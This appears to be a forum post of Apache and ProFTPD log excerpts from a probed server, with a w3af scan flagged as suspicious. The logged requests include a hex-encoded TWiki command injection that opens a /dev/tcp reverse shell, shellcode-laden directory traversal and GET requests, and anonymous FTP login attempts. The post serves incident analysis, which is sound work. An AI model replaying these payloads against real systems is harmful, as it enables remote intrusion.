10.13.37.10 - - [12/Apr/2010:11:39:00 +0200] "GET /g?\x921\xd0\xd2\xd5/5\x1c#\xd6\x98$\xb2<\x7f\x11\xd3\xe0)\xe1K%=}-3\xf5\xb5\x99\x91\x11\xe1{F\xb1\x87\xf7\xe2\x7ft|\x1d\x1c\x83\xd1\xeb\x1a\xd5?y,\x8c\xe0w%\x13\xfcz/sx(\xd6\x96pH\x88\xd4\x15\xb4\x8d\xb6\xb9JF4uGO\xb3<\x98\xb8=\x92\x19\xe3Nv7\x14*\xf9\xbe\x81\xfdf\xba9\xf5\xb7qB5\x9fg\x04'CI~$\xb0\xbf\x972\xd0\xf8\x05\x99\x90}@rA\x9b\xbb\x93\xb2\xb5K\xa9\x91-\xa8\x89\xe1~5{,\xba\xb7f$'J\"\xe0%\x9b\xb4vN\x1c\xb0rF@\x9f\xa9\x03\xfd\x15Ksuy/\x99i\xf8\x91\x93+\xf9}#\xf5\xb1q|-\x04\x86\xd4\x12\xf6\xe2\x7fI\x90xB<\x96\x97\xb5tz\x05\xb9\x01\xe3gwp?\x80\xebG\x1d\xbb8\xd5A7C\x92\xbek\xfc\xb64\xb8\x85\xff\xc1\xd2\xd6\xbf\xb3=HO\x14\x98\x8d\xb2\xa8~u5g\x04\x02\xe21\xfe\xc6\xc7\xc0\xf8\x7fq\x1cH\xb1s'\xa90\xd4\x84\xf94\x1b\xfdf\b\xe1x@G\x91!\xd6r\x10\xf5/\xa8\x92B\xb6\x05\xb5yJ|C%\x97?\x90z:\xfc\x937O;\xe3-\x18\xd5\x9f\x8d\xba\xb7I\x98<\x15\xb0\xbf{$\x96pA\xb8\xb4\x87\xd1\xebwK\xbe)\xe0F\xb2\xb9\x99t}\x14\xbbv=,|{q\x1d\x89\xeb9\xc1\xe1N\x9b\xb3\x9b\xb7\xb3\x1a\xf5\b\xe2A\x02\xe0s\x15NB\xb9g\xbe\x91\x9f\xbb\xb8\x1dy'\x11\xe3x\x7f/3\xfd?\x98\xb2\x93\x8d\x97vOH\xb5r5f\x1b\xd5\x92\xb6\x04F\x18\xf8G\x85\xd3\xd6\xb4\xbf\xb0C,K\x90\x8c\xc0\xfc\xb14wp\x05\x96$J;\xf9\xba<\x14}Iu%\x1c7tz=\xa9+\xd4@-\x99\xa8~f\x81\xe3*\xe0\x14{t7xwrz#\xfcB~=|\x15\x03\xf7\xe1qk\xd5\xa9\xbb\xb9JpA\x99\x12\xd4\xb3\x96sF?\xb5\x9b\xa8vG\x04\xb0g\xbe}<\x938\xd0\xf9C\x10\xeby!\xe2'\xbf\xb7\x8d\xb1H\x7f2\xf8%,\x9fKOu54\xb2\x88\xe3\x01\xe1$\xba\x92y:\xe2i\xf5r\"\xeb-w\x1c\xb8\xb4~1\xe0Nt(\xfds/\x98u\x05\x90v\x1d}0\xd6{I|@\xb6\x91\x97\x83\xf6\xd2\xfc\x97\x7f-\xb4f/z\x1d\x8d\x93\xb7\xbf\x19\xf9\x96\x98\xb9\xb5K\x15\x9b<p%\x1cNg\x13\xd65AF\x14G\x84\xfdC?\x99\xbe\x80\xf8,Oq\x04\xbb\xba\xb6=\x9f\x90\xb14\x92\xb2x\x05@$H\xd47\xb8\xf5\x86\xd5\x91I\xa9\xa8\xb0'\xb3JB3\xc9\xb1K\xdb\xcd\xd9t$\xf4\xbf\xd8n\xcf\xbb[\x83\xeb\xfc1{\x0f\x03\xa3a-N\xd2\xba\xe5C+\xbd\xfaLZB\x03\x8d<\xca\xe6\xbcn\xa8c\xec\xbe\xba&\x1d5\xee\xd2\x96;'\xd4\x1f\xf1\x11\xdb\xa04\x9e\xb7cWb\xca\xb7\xb7[\x05\xca\xb6\x9cx%\xeau\xf6\x94\x1a\xf1J%\x1b\xd5\xc0\x15cP\x16\xe1\xd9[GZV\x13\x7f\xd00\x84~5#\xf8\xc92\x97\x8a\xcb\x92\xe6s\xfa\xda\xa4M2\xd7\xb5\x8a\xf5\b\xc0\xe0\x05\xb4\xd22wbW\xa7\xdf\xe1\xcf\x03\xe1&\x89\xc0\xed\x83\xde\x8f\xf1\x123\xa4\x0e\x9e\xb2k\x87\xe4\x90\xaf\xc3\xbf\xb9\xf6\xa9n\xc6\xe9\x16\xceba\xb4\x1b\x14(\xd1\xe8*\xd3!g=\xa0\x13(\x95.\x18\xa13\xa8_\x98\x83&\x9e#\xf3oew\xa3\x07L\xf8(\xd8q-\xfe\x88\xdd\x9e\xbex\x9eNV\x93\x11\xb0F\x9c\xfb\xd9\xecfl\xec\xfdMf\x98\xff\x8d\xe3Nvka\x7f\xde#\x1e\xe6{\xbf\xbf\xe7V\xc5\x80lT9N\x85\x11)'el\x13\xeez[>\x0f\xefg\xe9X\x87e\xcc\xaf\b\x96;\xa4\x81\x02\x84\xd3\xed\xc2\x04$\xb8\x88\x04L\x1c\xe8Vic%\xcb\"\xf6\xc5\xba\x97Q\xad@\xc1\x96r\xba$'Om\x01\xad\xb9\x1bam\xaf\xa3\xbbw\xa9\xfd\x9fB\xb7\xb6\xa8G\xe9\x1c\xfc\xff\xff HTTP/1.1" 404 311 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:39:00 +0200] "GET /twiki/bin/view/Main/WebSearch?search=gWSkE5%27%3b/bin/echo%24%7bIFS%7d-ne%24%7bIFS%7d%27\\x30\\x3c\\x26\\x32\\x31\\x33\\x2d\\x3b\\x65\\x78\\x65\\x63\\x20\\x32\\x31\\x33\\x3c\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x74\\x63\\x70\\x2f\\x31\\x30\\x2e\\x31\\x33\\x2e\\x33\\x37\\x2e\\x31\\x30\\x2f\\x33\\x32\\x33\\x33\\x33\\x3b\\x73\\x68\\x20\\x3c\\x26\\x32\\x31\\x33\\x20\\x3e\\x26\\x32\\x31\\x33\\x20\\x32\\x3e\\x26\\x32\\x31\\x33%27%7csh%3b%23%27 HTTP/1.1" 404 339 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:39:00 +0200] "POST /nagios3/cgi-bin/statuswml.cgi HTTP/1.1" 404 339 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:39:04 +0200] "DESCRIBE /../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../\xcc\xcc\x90\x90%83%e2%1d%3c%40%b8%79%48%91%96%b6%2a%f5%74%4e%90%98%72%30%d5%3b%d6%04%86%fc%42%b4%2d%47%0c%be%9f%46%4b%b1%37%a9%77%11%d1%f9%14%35%b5%bb%27%49%78%43%ba%a8%71%71%08%eb%70%75%7c%7a%7e%7b%24%a9%bb%91%02%e0%1c%4f%98%b0%47%b7%4b%27%79%67%4e%46%38%fe%c6%c7%c6%c0%e2%74%7d%0b%d4%a8%76%04%b8%99%1d%ba%85%d5%87%d0%e1%31%d6%34%1a%fc%2c%97%48%b1%09%fe%c1%f8%41%37%b6%be%92%b3%9b%15%73%23%f9%7f%4a%9f%78%12%fd%bf%49%b5%90%77%72%40%b4%14%0c%05%35%93%8d%42%32%e3%43%2d%3c%b2%b9%96%66%22%f5%78%33%d2%eb%76%70%67%8d%b9%ba%28%e0%35%0c%93%99%98%74%04%77%66%b1%47%b4%48%b5%73%2c%b2%b8%43%91%79%7c%18%e2%40%a9%be%b6%1c%1b%f5%37%92%9b%9f%34%b7%05%bf%96%b0%2b%d4%4b%97%bb%90%7a%1d%4a%b3%14%81%fd%88%f6%d5%29%e3%46%a8%7e%3c%41%75%7d%01%f9%27%19%e1%71%2d%24%49%4f%72%42%7f%7b%6b%f8%03%fc%15%10%d6%39%f7%e1%73%78%7b%4e%84%d5%7c%79%76%72%70%43%b8%97%15%4e%98%b1%7a%6b%d6%92%75%69%d4%8d%ba%66%a8%3c%47%77%02%eb%71%1c%2c%b5%8c%e0%7d%4f%a9%14%41%48%74%24%04%b4%67%b0%bb%9b%96%2d%b3%b2%be%b6%89%e3%7e%49%35%21%f8%46%37%93%40%0c%7f%4b%91%99%90%29%e2%22%f5%81%fc%bf%4a%1d%9f%05%b9%42%0b%fd%87%f9%b7%34%27%73%37%7b%75%7f%70%11%d6%b2%ba%77%71%10%e1%4a%48%b6%76%79%67%05%2c%9b%47%72%08%eb%74%41%b5%b1%4f%a9%97%24%a8%7a%1d%7e%78%46%04%0c%91%96%18%d4%39%f9%4b%bf%b0%9f%7d%42%b7%43%98%b4%8d%90%35%bb%99%80%f7%e0%27%34%b8%40%2b%fc%b9%66%3c%7c%14%15%88%d2%f8%b3%92%86%d5%49%09%e3%2d%23%d1%e2%1c%33%c6%c0%fd%12%f5%93%4e%be%71%2c%99%93%7c%0c%b6%b0%85%e2%34%b4%40%13%f5%bf%47%a9%b9%8d%03%fe%c1%f8%9b%72%75%3b%d4%4b%1d%b2%4f%7d%74%49%67%9f%04%77%41%73%31%d6%92%97%32%eb%42%7a%14%98%3c%b3%b5%35%38%d0%e0%15%43%76%1b%d3%f9%91%4e%bb%7b%27%a8%96%46%7f%70%05%84%fc%b7%37%66%be%48%1c%7e%24%79%78%01%f6%e3%4a%19%e1%30%fd%2a%eb%72%1a%d5%83%e3%78%73%2d%b8%90%b1%ba%a8%98%3c%92%b0%67%28%d4%9b%4f%40%83%c7%c7%c1%e2%28%f8%0c%4a%47%4e%b4%b9%48%bf%43%7c%66%1d%09%d6%b5%99%42%b6%05%77%35%41%bb%04%49%7f%24%70%7b%11%f6%d5%b1%90%b8%96%75%74%76%2b%fd%b2%9f%31%e1%2c%97%b7%89%f9%86%e0%4b%91%37%46%14%a9%8d%0b%fc%ba%be%7d%34%80%f5%2d%71%1c%93%7a%7e%27%79%7a%79%15%b3%87%d3%eb%66%bf%7c%4a%22%f9%71%6b%d5%88%fc%7d%75%74%46%bb%b1%b3%78%77%34%03%d1%e3%12%e0%2c%18%e2%73%1b%f8%b7%b6%92%be%b5%97%3c%72%14%b9%90%41%1c%37%9b%b2%43%40%49%b8%48%47%8d%91%67%96%42%99%ba%70%7e%7b%05%04%4e%a9%76%0c%4b%b4%b0%32%d4%01%e1%33%d6%1d%9f%85%fd%93%98%4f%a8%35%27%15%3b%f5%7f%24%2d%7a%7b%73%7e%76%19%eb%29%e1%78%48%b6%4a%b2%99%77%1c%90%98%2a%fc%be%40%05%7f%75%70%23%fe%c6%c0%e0%04%2c%9f%3c%97%0c%7c%10%d4%b9%43%1d%bf%bb%47%37%b0%b3%13%fd%91%b1%93%42%72%49%a9%a8%27%24%9b%92%8d%96%30%f7%e3%4e%71%69%d5%67%8c%e2%2d%74%66%46%34%b7%81%d2%d6%b4%02%f5%35%84%f8%14%21%f9%b5%ba%41%15%7d%4b%b8%4f%79%77%08%f8%76%66%93%43%7f%1a%fc%97%4e%bb%39%d4%7d%0c%7c%73%75%38%d0%e1%34%b6%b5%21%e0%37%74%29%d2%eb%71%04%b8%72%35%91%1d%0b%d6%b9%92%48%4b%05%70%15%b1%b0%90%2b%d5%8d%b7%4f%42%2d%14%78%79%03%fd%67%2c%12%e2%24%32%f5%a9%3c%99%1c%a8%bf%ba%7a%27%41%47%b4%49%84%f9%7b%7e%46%98%96%33%f6%e3%40%b3%b2%74%4a%9b%9f%be%88%eb%75%7b%71%4e%b0%73%79%7c%76%2c%0c%b8%a8%96%3c%1d%02%fc%49%89%d6%7d%48%b6%b4%8c%c0%f9%91%1c%8d%b2%a9%4b%92%93%98%9f%04%99%14%42%7e%46%be%b5%b7%1a%d1%f8%9b%90%37%70%15%ba%97%b1%6b%d4%4f%2d%bf%47%80%fd%35%7a%27%43%b9%23%d5%24%41%22%e1%34%13%f5%7f%05%78%72%66%28%e0%40%bb%b3%08%e3%77%4a%83%e2%67%87%d3%e2%31%eb%43%7c%73%4e%b5%15%92%79%7f%39%f7%e1%74%40%66%b0%a8%09%d0%d4%77%7d%38%d5%19%e0%48%91%14%8d%be%70%78%67%46%b2%27%9f%71%72%7a%7b%42%49%b6%1d%75%76%2d%37%b4%4a%96%98%ba%35%93%1c%24%7e%11%e3%4f%bb%01%f9%0c%4b%1b%d6%9b%47%69%fc%2c%bf%04%86%fd%97%41%a9%b3%90%b1%b8%34%99%b7%05%b9%30%f5%79%7e%72%7a%7f%18%f8%81%eb%10%e0%3c%9f%b5%b0%99%92%90%bf%7b%67%43%b9%2a%e3%3c%49%14%bb%97%2d%76%35%a8%b4%4e%4f%85%d4%15%66%0c%71%78%3b%fe%c7%c6%c1%d1%e1%27%48%be%41%9b%b3%77%75%1d%4a%04%a9%30%f7%d6%b7%ba%33%f6%e2%74%03%f8%7c%13%fc%89%f9%37%98%96%2a%f5%23%d5%b6%70%34%47%05%8d%83%fd%b1%1c%2c%46%91%40%7d%73%4b%93%24%b2%42%b8%79%71%47%74%31%e2%66%1c%9f%b2%b3%a9%4a%b4%38%d3%e0%75%40%1d%72%7f%7e%69%fd%9b%ba%35%2d%87%c7%c0%fe%c6%c1%eb%05%bf%49%b6%7b%4b%b7%18%d5%b1%34%37%27%8d%92%7d%7c%73%42%90%08%fc%41%21%e3%2c%46%4f%14%b5%bb%91%77%76%43%98%a8%97%2b%f9%70%24%85%d2%e1%3c%88%f5%78%4e%7a%48%b9%15%96%04%0c%93%6b%d4%32%d0%e3%67%8c%d6%be%99%80%f8%b0%b8%92%84%eb%46%1c%bb%66%98%81%e1%7e%09%e2%7c%72%2c%b0%42%76%4f%97%b3%9f%27%14%7f%10%fc%78%70%74%15%b8%35%7d%0b%d5%96%be%bf%91%b2%a8%7b%01%f8%b4%2d%9b%b9%b6%4a%90%48%79%77%71%3c%40%1b%f9%99%b5%37%67%4b%47%b7%41%93%11%d6%b1%28%fd%0c%1d%02%d4%73%12%f5%8d%75%39%e0%04%49%ba%34%43%a9%7a%4e%24%05%1a%eb%74%7f%66%47%14%40%90%70%79%2c%35%7a%37%b3%19%e3%34%b1%7e%22%e2%46%97%b7%b9%3c%9b%91%b4%73%77%7c%15%27%04%29%d3%d6%9f%bf%4e%41%86%fd%92%43%05%4b%96%2d%0c%99%3b%fc%7b%1c%b8%75%1d%8d%7d%0b%f9%a9%2b%d1%e1%11%f7%c1%e0%49%42%69%d5%bb%b0%78%28%d4%48%71%4a%b5%a8%76%24%be%39%f8%23%f5%93%b2%b6%4f%98%72%67%ba%79%70%12%e0%75%40%2c%7e%77%3b%f9%7a%74%7b%76%1d%85%d4%98%9f%97%b7%66%81%e3%1c%0c%bb%15%4b%b6%87%d6%71%34%86%e1%48%b4%33%d0%d5%b9%47%42%ba%73%37%19%f8%46%b2%9b%67%b0%80%f5%bf%4f%91%7f%49%78%35%a8%99%38%e2%05%14%b1%43%90%84%eb%7c%27%b3%08%fc%04%b8%09%c0%fd%2d%4a%93%a9%96%b5%be%24%3c%7d%72%4e%8d%92%7a%74%77%73%41%a8%92%b7%bf%72%75%48%46%83%e1%24%01%e2%76%6b%fd%66%13%f6%d6%34%8d%43%2a%e0%79%71%78%49%35%7b%14%b1%96%47%b3%21%e3%70%04%7e%67%b5%b6%41%99%9f%97%30%f9%03%fc%4b%02%eb%7d%1d%31%f8%b4%ba%9b%4e%7f%42%7c%40%7e%18%eb%72%05%76%1a%e1%0c%b0%70%1c%90%7d%4f%b9%bb%71%2c%75%27%74%4a%93%7c%32%f5%8c%e2%22%d5%be%a9%77%15%73%1b%d4%7b%37%91%79%3c%b2%7f%2d%98%b8%b8%4a%8d%b2%78%10%d6%b1%a9%e3%1d%b5%bb%27%15%97%96%2d%d2%fd%48%b0%41%89%f8%42%35%4e%49%7a%05%66%b3%0c%43%4b%a8%34%24%40%ba%b4%e0%04%b9%92%14%3c%29%f9%d5%b7%f5%98%4f%46%37%bf%90%b6%91%d4%be%2c%9f%67%1c%99%93%88%fc%47%9b%bb%8d%6c%c1%31%d9%c3%2b%c9%d9%74%24%f4%5a%b1%1a%31%5a%12%83%c2%04%03%d7%62%23%c4%d6%ba%f3%77%48%6b%92%cf%5f%8a%97%b0%ae%4c%77%e1%80%fc%06%cc%a0%cc%36%9e%f0%9e%a0%d2%70%b6%c4%e1%55%4d%b1%06%97%2b%cb%70%70%fa%0b%d2%14%fc%e1%d1%82%ee%45%b4%9f%8f%f1%67%4f%fa%9f%df%a2%7a%0f%8a%66%23%7d%ca%69%9c%95%b2%63%4b%49%6a%f8%e4%fd%5b%9c%9d%93%2a%83%0e%38%7e%13%1f%fb%4d%13%6e%3c%1d%a3%90%71%1e.smi RTSP/1.0" 400 338 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:39:05 +0200] "GET .Y70'Lil_8U<a-2o3[GCsh94zJ2^wIJf@,ecOw4cVqCk[B3a;ghLP}N=iuLbdzZILQq*)W4,_`5Q>EBiYanx5x0'YoTMH_!Gpp='b_VEUB`bz|uLlXxN6!=o*!(kxR(MCju_!KQL<N5*Wn.|WITT51KxGaps3{pE$\"0h,UCw}E]@lan-OlkGrtC>bfM!Tq;<>J>EiRvi(cWnv9)c8NTrj{oVKcm\"eDijUoF[8I8T[8Mm,hu6P..ro!SnRTMEB;Y\")*S>@a4WDTC}[}b1xM^mT}N5yY$WD,(O[jU[(|8=oOjyb06zdlXLW*yJ>o-G<7U{,9||KL$nqxbH>Eh>]j@(J[wpxcJfzzE8agGU^5)gz[roX1CaFj3eV4[6-1iDkMbfsaiM!]YxSqoyW<!.r=-8il('8!1T.FW}`W(UfY@gZeP[zz*BYP{P=fy54r^@yAazIQ[k\"M]*FMT^v|.Tou!z$CF@@fpiK\")bHsrx<nZvCgH8cD\"Cd5C|{|p`f48s2NK" 400 338 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:38:55 +0200] "GET / HTTP/1.1" 200 5518 "-" "-"
Suspicious:
10.13.37.10 - - [12/Apr/2010:11:31:43 +0200] "GET / HTTP/1.1" 200 5518 "-" "w3af.sourceforge.net"
W3af => web app attack and audit framework to find and exploit web apps vulnerabilities
10.13.37.10 - - [12/Apr/2010:11:38:56 +0200] "GET /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 339 "-" "-"
http://www.securiteam.com/windowsntf...JP0L1F4KM.html
Code:
/var/log/apache2/error.log
[Mon Apr 12 11:30:38 2010] [error] [client 10.13.37.10] File does not exist: /var/www/CtFdLwr5.aspx
[Mon Apr 12 11:30:39 2010] [error] [client 10.13.37.10] script '/var/www/R0nDIs6Q.php' not found or unable to stat
[Mon Apr 12 11:31:31 2010] [error] [client 10.13.37.10] Unknown Transfer-Encoding: HESLIFIJ
[Mon Apr 12 11:31:31 2010] [error] [client 10.13.37.10] Unknown Transfer-Encoding: QMJKczsuwVCexUiMCftMmrDXzNkOSZwgFdbpkhgNcHgPbgotITDoYnADtqYDzWJjbqEFxasnsHKNSmTBLdSmyXZNKiamjguKHOthFqcyUhFIebPOLCZuvjvxAUyRxNUyVyLUIbuDLefXADJbhvZVaAZbipYixkYyAXeybIvuuVinORynIsTAyZFGBoKdoNNldMivLLtUkmVeSWQXPqhsKndihtmmpNPKFgEwAXiRhxgulFWPbEPeAlXGhorogbELJiICmIjjyWAoxAHJkDBImOLoDnaARjsEwbBarfKsVGKbKBPgMChWflzNDRGRIwNMpenDWjVpTZVHfwyQMEVleiIYQqLmEzyyFjyIWUUBVFkiFrwnZWsNYALzjXkRQUCtRpsKibZPoIZIIycbLuVGwQNzPnskoVnltYbTTlIevYXaRWuMMyHQbBIGfCCUUwGRRAxOjEdNwopGWToLytribYQPvAoQvHiItpOMCoQSAVcAXPOnqgfCAhZKjjqnYLtDrDvdNXPpsIOphSSOGYvlsgQvEKLiIpBtOvQTqeQTKKBRAmsPkVEgSREPtvvwAyUECWLIgeOqzoXjPRBUkUnNzLUQyneLmpojfEqzqyChEKqUSjmDGeOoaTHVgmuvtOQVqgwOgDqhxSNIFtitIYdzrzLCiVzyDbzuPUyOpCXSPkHXPSoAIgXxQuoHnuAogfRNYKGuqetsjjHRZWtCUJxgYiTcWcjOWqcbjMsOTaeSnthbpcRJxmodtmtuvlBtJJTbUfnqilyloybMezIBuhvZSgtYTOyaYrIzJfKdIyOuSUXZBsrzIYPxfxlkwOgJoAkyOXUzeZFxjtqVNbVAChYbUpDHDSgHWgDGQjRWuakcpdTqoCsfcFLTwMNmYMbmQmyDwwPzQiqCyXhXQKEMvMwbCkKmGZGcnqFoighqHVqbGQxZbGGKZzhgrtZkujWzJYqpXHSjgJIzYpvcWvZozFxhewxOncmquestqslWWGUcRIYoqvjCWGIVZErhPxzJzRNrd
[Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] File does not exist: /var/www/asdfg.hjkl
[Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] Invalid URI in request HEAD /../../../../../ HTTP/1.0
[Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] request failed: URI too long (longer than 8190)
Var/log/proftpd/proftpd.log
Code:
Apr 09 11:34:07 ServerGroep1 proftpd[3368] ServerGroep1 (Flaptop.lan[::ffff:10.0.0.11]): Maximum login attempts (3) exceeded, connection refused
Apr 09 11:52:31 ServerGroep1 proftpd[3522] ServerGroep1 (Flaptop.lan[::ffff:10.0.0.11]): notice: unable to use '~/' [resolved to '/var/www/user/ton/']: No such file or directory
Apr 12 11:11:50 ServerGroep1 proftpd[3012] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:11:50 ServerGroep1 proftpd[3012] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:11:57 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:11:57 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:11:57 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:12:02 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:12:26 ServerGroep1 proftpd[3026] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:12:26 ServerGroep1 proftpd[3026] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:12:41 ServerGroep1 proftpd[3029] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:12:41 ServerGroep1 proftpd[3029] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:12:51 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:12:51 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:12:51 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:12:51 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:12:51 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:12:51 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:12:52 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:12:56 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:12:57 ServerGroep1 proftpd[3040] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:12:57 ServerGroep1 proftpd[3040] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:13:10 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:13:10 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:13:10 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:13:15 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:14:54 ServerGroep1 proftpd[3059] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:14:54 ServerGroep1 proftpd[3059] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:15:47 ServerGroep1 proftpd[3063] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:15:47 ServerGroep1 proftpd[3063] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:16:56 ServerGroep1 proftpd[3071] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:16:56 ServerGroep1 proftpd[3071] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:20:10 ServerGroep1 proftpd[3105] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:20:10 ServerGroep1 proftpd[3105] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:20:17 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:20:17 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:20:17 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:20:17 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:20:17 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:20:17 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:20:18 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:20:22 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:25:17 ServerGroep1 proftpd[2886] ServerGroep1: ProFTPD killed (signal 15)
Apr 12 11:25:17 ServerGroep1 proftpd[2886] ServerGroep1: ProFTPD 1.3.1 standalone mode SHUTDOWN
Apr 12 11:25:54 ServerGroep1 proftpd[2853] ServerGroep1: ProFTPD 1.3.1 (stable) (built Tue Oct 27 10:09:08 UTC 2009) standalone mode STARTUP
Apr 12 11:28:20 ServerGroep1 proftpd[2993] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:28:20 ServerGroep1 proftpd[2993] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
